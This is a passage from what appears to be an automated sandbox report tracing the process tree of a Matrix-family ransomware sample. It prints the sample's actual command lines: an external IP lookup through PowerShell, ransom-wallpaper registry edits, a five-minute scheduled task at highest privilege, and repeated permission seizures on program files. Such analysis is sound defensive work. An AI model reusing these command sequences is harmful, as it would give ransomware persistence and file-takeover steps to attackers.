wrote to memory of 1072 2204 cmd.exe takeown.exe PID 2204 wrote to memory of 1072 2204 cmd.exe takeown.exe PID 588 wrote to memory of 892 588 wscript.exe cmd.exe PID 588 wrote to memory of 892 588 wscript.exe cmd.exe PID 588 wrote to memory of 892 588 wscript.exe cmd.exe PID 588 wrote to memory of 892 588 wscript.exe cmd.exe PID 948 wrote to memory of 2084 948 cmd.exe reg.exe PID 948 wrote to memory of 2084 948 cmd.exe reg.exe PID 948 wrote to memory of 2084 948 cmd.exe reg.exe PID 948 wrote to memory of 2084 948 cmd.exe reg.exe PID 2204 wrote to memory of 2228 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2228 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2228 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2228 2204 cmd.exe cmd.exe PID 2228 wrote to memory of 2592 2228 cmd.exe Gi44eNKg.exe PID 2228 wrote to memory of 2592 2228 cmd.exe Gi44eNKg.exe PID 2228 wrote to memory of 2592 2228 cmd.exe Gi44eNKg.exe PID 2228 wrote to memory of 2592 2228 cmd.exe Gi44eNKg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmz9gZP.exe"2⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmz9gZP.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmz9gZP.exe" -n2⤵
- Executes dropped EXE
PID:2504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fTcdu4c7.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\blodNw7J.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\blodNw7J.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1564
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\K660oEDf.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\K660oEDf.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\bXqnuShk.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:892
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\bXqnuShk.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1980
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2044
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:3748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\Gi44eNKg64.exeGi44eNKg.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:3052 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:4320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵
- Modifies file permissions
PID:2360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3008 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:2004 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:4712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:4964 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:4004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:4780 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:4228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:636 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:888 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:4220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:3988 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:3888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:2244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
- Loads dropped DLL
PID:3184 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:3112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ChessMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ChessMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
PID:3364 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:3376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:3236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
PID:3536 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
PID:3548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
PID:3596 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵
- Modifies file permissions
PID:3968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵
- Loads dropped DLL
PID:2040 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:1112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "forms_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "forms_super.gif" -nobanner4⤵
- Executes dropped EXE
PID:2152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:4660 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "review_browser.gif" -nobanner4⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵
- Loads dropped DLL
PID:1488 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:4684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "tl.gif" -nobanner3⤵
- Loads dropped DLL
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "tl.gif" -nobanner4⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵
- Loads dropped DLL
PID:4088 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "Identity-V" -nobanner3⤵
- Loads dropped DLL
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵
- Loads dropped DLL
PID:984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵PID:2304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵
- Loads dropped DLL
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵
- Executes dropped EXE
PID:2580
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵
- Loads dropped DLL
PID:2472 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:4084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "eula.ini" -nobanner3⤵
- Loads dropped DLL
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "eula.ini" -nobanner4⤵
- Executes dropped EXE
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵
- Loads dropped DLL
PID:4048 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:4448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "AcroSign.prc" -nobanner3⤵
- Loads dropped DLL
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "AcroSign.prc" -nobanner4⤵
- Executes dropped EXE
PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵
- Loads dropped DLL
PID:4604 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:2144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:4944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SC_Reader.exe" -nobanner3⤵
- Loads dropped DLL
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SC_Reader.exe" -nobanner4⤵
- Executes dropped EXE
PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵
- Loads dropped DLL
PID:4732 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "brt55.ths" -nobanner3⤵
- Loads dropped DLL
PID:2184 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "brt55.ths" -nobanner4⤵
- Executes dropped EXE
PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4824
-
-
-
